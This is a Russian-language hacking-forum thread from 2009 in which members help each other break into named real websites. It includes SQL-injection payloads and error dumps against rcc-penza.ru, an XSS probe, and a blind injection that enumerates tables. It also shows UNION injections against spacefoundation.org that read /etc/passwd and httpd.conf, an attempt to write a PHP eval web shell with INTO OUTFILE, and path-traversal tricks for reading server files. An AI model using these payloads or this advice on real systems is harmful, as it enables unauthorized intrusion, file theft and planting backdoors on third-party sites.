 |
|
13.11.2009, 12:42
|
|
Постоянный
Регистрация: 24.03.2009
Сообщений: 670
С нами:
9017461
Репутация:
414
|
|
2totem
Код:
$ gcc -fno-stack-protector -o exp exploit.c
|
|
|
13.11.2009, 15:24
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами:
9851463
Репутация:
19
|
|
нашел вроде как инъекцию в поиске, но результат вылетел какойто запутанный:
Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `db_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/.../req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript :void(0);" onclick="javascript :var st=document.getElementById('stBlock');st.style.dis play=(st.style.display=='none')?'block':'none';">S tack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/.../req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/..../req/db/drivers/mysql/MySqlConnection.class.php on line 176 как в данном случае можно подставить запрос? |
|
|
|
13.11.2009, 15:41
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
M1Ks продолжаем тему... ребята вообще тут идет такая лажа как на video.antichat.ru
когда в поле поиск вбивали кавычку и оно выдавало ошибку (все идет из-за бажного поисковика) может есть какие то способы крутить такие скули
http://rcc-penza.ru/advanced_search/
импульс на ковычку
Код:
Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.display=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176
импульс на XSS ( "><script>alert('XSS');</script> )
Код:
Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE `name` LIKE '%"><script>alert('XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AN' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.display=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.p in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176
|
|
|
|
13.11.2009, 16:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
2 [x60]unu
раскручиваем как blind по методу Qwazar'a [ подробнее ]
Код:
xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b/*
и видим 1ю таблу : CHARACTER_SETS
Последний раз редактировалось RulleR; 13.11.2009 в 16:41..
|
|
|
|
13.11.2009, 18:53
|
|
Познающий
Регистрация: 03.06.2007
Сообщений: 44
С нами:
9968047
Репутация:
48
|
|
Сообщение от icekvot
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
Попробуй вместо пробела $IFS
|
|
|
|
Не получается залить/найти абсолютный путь |
13.11.2009, 18:55
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами:
9034600
Репутация:
0
|
|
Не получается залить/найти абсолютный путь
Привет
вот вроде как уязвимость
http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd') from+mysql.user--+
проверка на заливку
http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'<?php eval($_GET[‘e’]) ?>' from+mysql.user INTO OUTFILE '/tmp/aaaaaaaaa11231.php'--+
-все записывается в папку /tmp/ , так же если захожу в /etc/passwd отображается список админов + вроде абсолютные пути к сайтам ..,но !или нет прав записи или же абсолютный путь не правильный - это если заливать по пути который указан для админа по /home/virtual/site3/fst/home/spacefoundation в /etc/passwd 
И еще когда читаю файл из tmp то запись там вида -
1,2,3,4,5,6,7,8,9,10+<?php eval($_GET[‘e’]) ?> находится в сорсе ,...+ проверял на ошибки чтоб выдавал путь - без толку. в кеше гугла ошибок нет..
проверял на наличие стандартных папок по этим шаблонам - http://forum.antichat.ru/threadnav30632-1-10.html -тоже ничего не обнаружил ...очень конечно привлекло внимание расписанный /etc/passwd .. Есть мысли ?
Последний раз редактировалось apekoff; 13.11.2009 в 19:06..
|
|
|
|
13.11.2009, 19:19
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.
OS: RedHat:
Код:
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+
DocumentRoot "/var/www/html
Последний раз редактировалось Ins3t; 13.11.2009 в 19:24..
|
|
|
|
13.11.2009, 19:23
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
Сообщение от icekvot
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
?lang=../../../../Documents+and+Settings/
|
|
|
|
13.11.2009, 19:28
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами:
9034600
Репутация:
0
|
|
нашел ... а в какой строчке искать сие чудо ? ну или хотя бы куда смотреть ... или выложить целиком этот файл сюда ?ага извеняюсь , не заметил что поправил сообщение ..
Последний раз редактировалось apekoff; 13.11.2009 в 19:35..
|
|
|
|
13.11.2009, 19:36
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra
Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1685231){kind=avatar}
Похожие темы
Линейный вид
